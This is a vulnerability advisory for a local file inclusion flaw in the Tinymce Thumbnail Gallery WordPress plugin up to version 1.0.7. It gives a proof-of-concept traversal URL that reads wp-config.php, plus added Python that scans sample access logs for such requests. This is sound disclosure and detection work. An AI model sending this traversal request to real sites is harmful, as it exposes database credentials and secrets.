Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php Local File Inclusion

Proof of Concept

As seen in access logs:

http://www.example.com/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
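Because the advisory's evidence is an access-log line, the natural defensive check is a log sweep. The following is an added example, not part of the original advisory: it parses Apache combined-format lines, isolates requests to download-image.php, and flags any href value that escapes the plugin directory (including percent- and double-encoded forms). The log lines are constructed samples; the IPs and user agents are placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Aug/2014:10:00:01 +0000] "GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1" 200 2931 "-" "curl/7.35.0"
203.0.113.5 - - [01/Aug/2014:10:00:02 +0000] "GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 2931 "-" "curl/7.35.0"
198.51.100.7 - - [01/Aug/2014:10:00:03 +0000] "GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=wp-content/uploads/2014/07/photo.jpg HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Aug/2014:10:00:04 +0000] "GET /wp-login.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
VULN_SCRIPT = "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %252e%252e does not slip past the check."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(href):
    """True if href would leave the intended directory: a '..' segment,
    an absolute path, or an embedded null byte."""
    href = fully_decode(href).replace("\\", "/")
    if href.startswith("/") or "\x00" in href:
        return True
    return any(seg == ".." for seg in href.split("/"))

def find_lfi_attempts(log_text):
    """Return (ip, status, decoded href) for each request abusing download-image.php.
    A 200 status on such a line means the server most likely served the file."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith(VULN_SCRIPT):
            continue
        for href in parse_qs(url.query).get("href", []):
            if is_traversal(href):
                hits.append((m.group("ip"), int(m.group("status")), fully_decode(href)))
    return hits
```

Any hit with a 200 status should be treated as a probable disclosure of the requested file (wp-config.php holds the database credentials and salts), so rotate those secrets as well as upgrading the plugin.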

Affects Plugin

Tinymce Thumbnail Gallery <= 1.0.7, fixed in version 1.1.0

References

EXPLOITDB 19022
PACKETSTORM 113417
URL https://plugins.trac.wordpress.org/changeset/556394/tinymce-thumbnail-gallery

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Views 4930
Verified No
WPVDB ID 6219

Timeline

Publicly Published 2014-08-01
Added 2014-08-01
Last Updated 2019-11-01
